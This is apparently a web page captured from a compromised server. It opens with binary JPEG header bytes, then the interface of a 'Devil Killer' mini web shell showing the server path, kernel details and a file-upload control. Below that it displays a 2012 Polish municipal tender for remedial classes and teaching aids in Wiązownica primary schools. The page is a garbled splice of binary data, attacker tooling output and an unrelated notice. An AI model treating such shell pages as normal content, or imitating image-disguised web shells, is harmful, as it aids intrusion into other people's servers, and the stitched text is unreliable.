JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121119/243721-N-2012.html

<p class="kh_header"><b>Wiązownica: Indywidualizacja procesu nauczania i wychowania uczniów klas I-III Szkół Podstawowych w gminie Wiązownica w ramach  Działania: 9.1.Wyrównywania szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
Poddziałanie: 9.1.2.Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</b><br>
<b>Numer ogłoszenia: 243721 - 2012; data zamieszczenia: 19.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , Wiązownica 208, 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.regiony.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III Szkół Podstawowych w gminie Wiązownica w ramach  Działania: 9.1.Wyrównywania szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
Poddziałanie: 9.1.2.Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiot zamówienia dotyczy przeprowadzenie dodatkowych zajęć w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Wiązownica, współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
2) Zajęcia w ramach projektu prowadzone będą w 7 szkołach na terenie Gminy Wiązownica: 
	1) Szkoła Podstawowa w Szówsku 
	2) Szkoła Podstawowa w Wiązownicy 
	3) Szkoła Podstawowa w Manasterzu 
	4) Szkoła Podstawowa w Piwodzie ( wraz z Filią w Cetuli)
	5) Szkoła Podstawowa w Zapałowie 
	6) Szkoła Podstawowa w Ryszkowej Woli
	7) Szkoła Podstawowa w Mołodyczu
3) W ramach projektu przewiduje się dodatkowo doposażenie sal  w pomoce dydaktyczne niezbędnych do prawidłowego  prowadzenia zajęć przewidzianych  w ramach projektu.
4) Wszystkie zajęcia odbywać się będą w dni nauki szkolnej po zakończeniu obowiązkowych zajęć lekcyjnych. Zamawiający zapewni bezpłatny dostęp do sal, w których prowadzone będą zajęcia w szkołach biorących udział w projekcie. 
5)Wykonawca zapewni osiągnięcie docelowych wskaźników projektu określonych we  wniosku o dofinansowanie we wskazanych poniżej zadaniach: 
 - poprawa umiejętności uczniów ze zdiagnozowanymi deficytami logopedycznymi , 
 - poprawa umiejętności uczniów poprzez zajęcia wyrównawcze z czytania i pisania oraz z matematyki - dotyczy wszystkich uczestników zajęć przeznaczonych dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu oraz dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, 
 - zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji  społecznej, 
 - zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy oraz  rozwijanie szczególnych zainteresowań uczniów w tym: zainteresowań matematyczno - przyrodniczych, plastycznych  i  artystycznych. 
6) Obowiązki wykonawcy: 
Osoby prowadzące poszczególne zajęcia przeprowadzą ewaluację projektu, sporządzą testy   oraz ankiety z ewaluacji w terminie ustalonym przez Zamawiającego, sprawdzające wiedzę  uczniów na początku oraz na końcu przeprowadzonych zajęć. 
Zobowiązane są do prowadzenia  dokumentacji szkoleń w postaci dzienników zajęć. 
Harmonogram realizacji poszczególnych zajęć Wykonawca opracuje we współpracy z 
dyrektorami poszczególnych szkół biorących udział w projekcie, uwzględniając podział zajęć dla każdej szkoły oraz plan lekcji beneficjentów ostatecznych. Harmonogram zajęć będzie musiał być dostosowany do harmonogramu zajęć w ujęciu miesięcznym i rocznym wynikającym z wniosku o dofinansowanie oraz potrzeb Zamawiającego. Zamawiający zastrzega sobie prawo do zmiany miesięcznego planu zajęć. Zmiana przedmiotowego planu zajęć nie wymaga formy aneksu do umowy. Przed rozpoczęciem zajęć edukacyjnych 
Wykonawca otrzyma od dyrektorów poszczególnych szkół objętych projektem listy uczniów zakwalifikowanych do udziału w projekcie (Beneficjentów Ostatecznych), z podziałem na grupy w ramach każdego rodzaju zajęć. Liczba osób w grupie dla poszczególnych rodzajów zajęć będzie zgodna z wytycznymi określonymi w Rozporządzeniu Ministra Edukacji  Narodowej z dnia 17 listopada 2010 r. (Dz. U. z 2010 r. Nr 228, poz. 1487) w sprawie zasad udzielania i organizacji pomocy psychologicznej w publicznych przedszkolach, szkołach placówkach oraz z zapisami wniosków o dofinansowanie projektu. 
7) Wykonawca będzie przekazywał następujące dokumenty dotyczące realizacji zajęć: 
- miesięczne sprawozdania z realizacji godzin w poszczególnych grupach zawierające analizę  frekwencji uczestników na zajęciach (w terminie do 10 dnia następnego miesiąca), 
- imienny wykaz osób, które brały udział w zajęciach (w terminie do 10 dnia następnego miesiąca), 
- imienny wykaz osób, które zrezygnowały z udziału w zajęciach (w terminie do 10 dnia następnego miesiąca), 
    - lista obecności uczniów (w terminie do 10 dnia następnego miesiąca), 
    - opisowa indywidualna ocena każdego ucznia na koniec projektu, 
    - zbiorcze podsumowanie dotyczące badania rezultatów zrealizowanych zajęć dydaktycznych w całym okresie obowiązywania umowy. 
Wykonawca będzie zobowiązany do prowadzenia dziennika zajęć osobno dla każdej grupy oraz do prowadzenia zajęć metodami aktywizującymi z uwzględnieniem indywidualnych potrzeb edukacyjnych i rozwojowych dziecka, z wykorzystaniem zakupionych w ramach projektu pomocy i materiałów dydaktycznych od momentu ich dostarczenia przez Zamawiającego. 
Wykonawca jest zobowiązany umieścić logo programu i oznaczenia wskazane przez Zamawiającego na wszystkich opracowanych przez siebie materiałach oraz w korespondencji prowadzonej w związku z realizacją umowy. Wykonawca będzie zobowiązany do wydania uczestnikom projektu zaświadczeń o udziale w danych zajęciach na zakończenie zajęć. 
  
Przedmiotem zamówienia został podzielony na  8 następujących części:
Część Nr 1 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Wiązownicy
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 32 godz. 
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 8 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  
    ( 2 grupy) w 
    łącznym wymiarze  godzin w ilości 64 (2 grupyx32).
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 13 uczniów.
3. Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze 
    w ilości 32 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 5 uczniów.
4. Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych, ze 
    szczególnym uwzględnieniem nauk matematyczno - przyrodniczych w tym: 
    prowadzenie obserwacji  przyrodniczych, wykonywanie doświadczeń i     
    eksperymentów, prowadzenie hodowli i obserwacje mikroskopowe, rozwijanie 
    zainteresowań i zdolności matematycznych z 
    ukierunkowaniem do udziału w konkursach matematycznych w  łącznym wymiarze 
    w  ilości 32 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów.
5. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych plastycznie 
    w  łącznym wymiarze  w ilości 32 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 12 uczniów.
Część Nr 2 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Szówsku
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 40 godz. 
    Termin    realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 8 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w 
    łącznym wymiarze w ilości 40 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 8 uczniów.
3. Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze 
    w ilości 80 godzin (2 grupy x40 godz.).
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 8 uczniów.
4. Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 
    40 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 7 uczniów.
 5. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze 
    szczególnym uwzględnieniem umiejętności plastycznych i technicznych w  łącznym 
    wymiarze  w  ilości 40 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 8 uczniów.
Część Nr 3 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Piwodzie ( wraz z filią w Cetuli) 
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 35 godz. 
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 7 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w 
    łącznym  wymiarze  w ilości 35 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 6 uczniów.
3. Zajęcia logopedyczne  dla dzieci z zaburzeniami rozwoju mowy łącznym wymiarze  
    w ilości 80 godzin (2 grupy x40 godz.).
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 14 uczniów.
4. Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 
    120 godz. ( 3 grupyx40 godz.)
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 28 uczniów.
5. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze 
    szczególnym uwzględnieniem  umiejętności teatralnych w  łącznym wymiarze  w 
    ilości 35 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów.
6. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze 
    szczególnym uwzględnieniem  umiejętności  plastycznych w  łącznym wymiarze  w 
    ilości 35 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów.
Część Nr 4 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Ryszkowej Woli 
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 90 godz. ( 3 grupy)    
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 11 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w 
    łącznym wymiarze w ilości 60 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 6 uczniów.
3. Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 
   30 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 3 uczniów.
4. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze 
    szczególnym uwzględnieniem  nauk matematyczno - przyrodniczych, np. 
    prowadzenie obserwacji   przyrodniczych w  łącznym wymiarze  w ilości 30 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 4 uczniów.
5. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze 
    szczególnym uwzględnieniem  umiejętności artystycznych, w  łącznym wymiarze  
    w  ilości 30 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 5 uczniów
Część Nr 5 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Zapałowie
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 90 godz. ( 3 grupy)  
    godz. 
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 22 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w 
    łącznym wymiarze  godzin w ilości 60 godz. ( 2 grupy)
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów.
3. zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy  ( 2 grupy) w 
    łącznym  wymiarze godzin w ilości 60 godz. ( 2x30 godz.)
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów.
4. Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami 
    komunikacji 
    społecznej w łącznym  wymiarze  w ilości 30 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 4 uczniów.
5. Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 
    30 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 10 uczniów.
6. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze 
    szczególnym uwzględnieniem  umiejętności plastycznych, w  łącznym wymiarze w 
    ilości 30 godzin.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 5 uczniów
Część Nr 6 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Manasterzu
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 32 godz. 
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 6 uczniów.
2. Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 
    32 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 6 uczniów.
Część Nr 7 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Mołodyczu
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
    zagrożonym ryzykiem dyslekcji w łącznym  wymiarze w ilości 200 godz. 
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 14 uczniów.
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w 
    łącznym wymiarze  w ilości 120 godz.
    Termin realizacji  do dnia 30.06.2013 r. 
    Łączna liczba uczniów objęta zajęciami - 9 uczniów.

Część Nr 8 Doposażenie sal dydaktycznych w pomoce dydaktyczne na doposażenie sal dydaktycznych szkół  niezbędnych do prawidłowego prowadzenia zajęć przewidzianych  w ramach projektu.

I. Szkoła Podstawowa Mołodycz  
1. Klocki ortograficzne POLY  				2 kpl.
2. Czytam i piszę						2 kpl.
3. Kocham czytać						2 kpl.
4. Kocham czytać						2 kpl.
5. Bingo							2 szt.
6. Waga							2 szt.
7. Zegar							2 szt.
8. Dystansowicz						2 szt.
9. Miarki szkolne						2 szt.
10. Miarki elastyczne						2 szt.
11. Stopy miarki						2 szt.
12. Liczydło stojące						1 szt.

II. Szkoła Podstawowa Manasterz 
1. Diagnoza ucznia w ramach indywidualizacji nauczania - podręcznik dla nauczyciela  1 szt.
2. Alfabet z obrazkami  					1 szt.
3. Zestaw indywidualny podstawowy  			6 szt.
4. Warsztaty graficzne 					1 szt.
5. Warsztat doskonalenia graficznego  			1 szt.
6. Komplet plansz 3 linie 					1 kpl.
7. Białe ołówki (12 szt.) 					1 kpl.
8. Tabliczki ze szlaczkami 1  					1 kpl.
9. Tabliczki ze szlaczkami 2  					1 kpl.
10. Dywanik glottodydaktyczny  				1 szt.
11. Nauka ortografii z glottodywanikiem - podręcznik  	1 szt.
12. Klocko LOGO  						1 szt.
13. Instrukcja do klocków LOGO 				1 szt.
14. Koloruję i poznaję literki  					6 szt.
15. Szlaczki dla sześciolatka 					4 szt.
16. 311 szlaczków i zygzaków 				1 szt.
17. Kaligrafia  							2 szt.
18. Zeszyt do kaligrafii dla sześciolatków   			4 szt.
19. Lewa ręka rysuje i pisze cz. 1, cz. 2, cz. 3  - 		po 2 szt.
20. Ortograficzne kwiatki  					1 szt. 
21. Detektyw Ortografem  					1 szt.
22. Jak przez wiersze ortografia szybko nam do głowy trafia 1 szt. 
23. Drewniana leniwa ósemka  				1 szt. 
24. Kącik manipulacyjny Kaja  				1 szt. 
25. Piaskownica 						1 szt. 
26. Piasek do piaskownicy 					1 szt.
27. Akcesoria do piaskownicy  				1 szt. 
28.Materace gimnastyczne  					6 szt.
29.Zestaw blokomodułów (część drewnianych)  		1 szt.
30.Drabinki   							3 szt.
31.Ławka gimnastyczna 2 m 	 				3 szt.
32.Równoważnia 6-zaczepowa   				2 szt.
33.Maty  							10 szt.  
34.Drążki gimnastyczne 1 m (kolorowe)   			12 szt. 
35.Kolorowe woreczki z granulatem   			12 szt.
36.Piłeczki (Igliczki)  						6 szt.
37.Mata noppex z klockami   					6 szt.
38.Kolorowe piłki lekarskie  2 kg.  				4 szt. 
39.Piłki lekarskie  1 kg.   					6 szt. 
40.Twister   							6 szt.
41.Dyski sensoryczne (zestaw)  				1 szt. 
42.Ciężarki z rzepami 0,5 kg.   				7 szt.
43.Taśmy rehabilitacyjne  					5 szt.
44.Kocyki 							7 szt.
45.Miękkie piłeczki   						7 szt.
46.Obręcze   							7 szt.
47.Platforma gimnastyczna z myszką lub kulką +2 wymienne tarcze     1 szt. 
48.Plansza bujaczek   						2 szt.
49.Piłka sensoryczna  65 cm.   				2 szt.
50.Piłka sensoryczna  50 cm.   				2 szt.
51.Ringo sensoryczne 17 cm.  				7 szt.
52.Piłeczki kolczaste 8 cm. Komplet   			4 szt.
53.Skakanki  							7 szt.
54.Zjeżdżalnia   						2 szt.
55.Zestaw gimnastyczny - piankowy tor przeszkód   	1 szt.
56.Gumowa piłka w kształcie fasoli z kolcami do masażu 5x16     2 szt.
57.Zestaw tyczek do zabaw ruchowych zestaw   		1 szt.

III. Szkoła Podstawowa Zapałów
1.Plansza magnetyczna					4 szt. 
2.Piramida ortograficzna 					2 szt.
3.Domino ortograficzne  4 szt.  tarcza do czytania  		5 szt.
4.Pomoce do układania wzorów   				5 szt.
5.Pomoce do rozkładnaia liczb. 				1 szt.
6.Pomoce do rozkładnaia liczb.   				10 szt.
7.Waga matematyczna   					1 szt.
8.Układanki logiczne   					5 szt. 
9.Strategiczna gra matematyczna   				2 szt. 
10.Ruletka do liczenia pamięci    				1 szt.
11.Zabawka motylkowa   					1 szt.  
12.Liczydło 							1 szt.
13.Układanka do percepcji wzrokowej,  			1 szt.
14.Układanki rozwijających myślenie   			4 szt.
15.Maszyna tkacka   						8 szt.
16.Farby 							1 szt.
17.Markery do malowania na tkaninach   			3 szt.

IV. Szkoła Podstawowa Piwoda (wraz z Filią w Cetuli)
1.Rebusy   							1 szt.
2.Domino wyrazowe  						1 szt.
3.Domino obrazkowo- wyrazowe  				1 szt.
4.Liczydło stojące  						1 szt. 
5.Waga szkolna  						1 szt.
6.Zestaw dużych odważników  				1 szt.
7.Słowa i zadania  						2 szt.
8.Plansze ( słowa i zadania)   					2 szt.
9.Co to kto to?  Rzeczowniki  					2 szt.
10.Czasowniki  						2 szt.
11.Karty do ćwiczeń motoryki i narządów artykulacyjnych  	2 szt.
12.Piłki skaczące  55 cm.   					3 szt.
13.Materace - 3 częściowy  					1 szt.
14.Walec gruby  						1 szt.
15.Sensoryczna piłka  75 cm.   				2 szt. 
16.Teatrzyk   							1 szt.
17.Pacynki  							1 szt.
18.Mini stemple - Boże Narodzenie   			1 szt.
19.Mini stemple  Wielkanoc  					1 szt.
20.Stemple zwierzęta domowe 				1 szt. 
21.Kuferek na cały rok  					1 szt.
22.Majsterkowanie z filcem   					1 szt.
23.Szablony farma  						1 szt.
24.Dziurkacz średni płatek śniegu   				1 szt.
25.Dziurkacz średni margaretka 				1 szt.

V. Szkoła Podstawowa Ryszkowa Wola
1.Paleta - wyprawka pierwszoklasisty			3 szt.
2.Idę do szkoły PUS 1-4					4 szt.
3.Analiza i synteza wzrokowa					1 szt.
4.Loteryjka obrazkowa					1 szt.
5.Klocki LOGO						1 szt.
6.Bawię i uczę  zeszyt A					1 szt.
7.Plansza do początkowej nauki czytania			1 szt.
8.Alfabet							1 szt.
9.Łatwe ćwiczenia do nauki czytania 1-4			4 szt.
10.Domino wyrazowe						1 szt.
11.Sylaby w dominie						1 szt.
12.Małymi kroczkami ćwiczenia do zajęć wyrównawczych dla kl. 1-2	1 szt. 
13.Domino zwierzaki						1 szt.
14.Domino faktur i kształtów					1 szt.
15.PUS skoncentruj się					2 szt.
16.PUS  rusz głową						2 szt.
17.Tarcze ćwiczeń N1, M2					2 szt.
18.Tablice do liczenia						1 szt.
19.Klocki z tworzywa						1 szt.
20.Domino z pianki						2 szt.
21.Dodawanie do dwudziestu				1 szt.
22.PUS liczę w pamięci					5 szt.
23.Skaczące planety						3 szt.
24.Piłeczka sensoryczna					1 szt.
25.Gra  TWIST - która godzina				1 szt.
26.PUS ułamki							1 szt.
27.Pierwsze ułamki - domino					1 szt.
28.Piramida matematyczna  M1,  M2				2 szt.
29.PUS to już potrafię  1, 2, 3					3 szt.
30.Zestaw na cały rok						5 szt.
31.Dziurkacz							6 szt.
32.Nożyczki z wzorkiem					3 szt.

VI. Szkoła Podstawowa Szówsko
1.Euterapeutica dyslekcja - program komputerowy do ćwiczeń z dziećmi  
   z trudnościami  w pisaniu i czytaniu  			1 szt.
2.Zielone tabliczki do pisania kredą   			8 szt.
3.Kropki alfabetyczne gra ruchowa   				1 szt.
4.Woreczki z grochem - litery    				1 szt.
5.Łatwe liczenia do naki czytania   				4 szt.
6.Ortografia   							4 szt.
7.Części mowy  						3 szt.
8.Euterapeutica program komputerowy do ćwiczeń 
   z dziećmi  z trudnościami  matematycznymi   		1 szt.
9.Zestaw kontrolny Pus 					8 szt.
10.Liczę w pamięci zestaw 5 części    			5 szt.
11.Matematyka na wesoło  4 części    			4 szt. 
12.Gra karciana mini calcu la   				1 szt. 
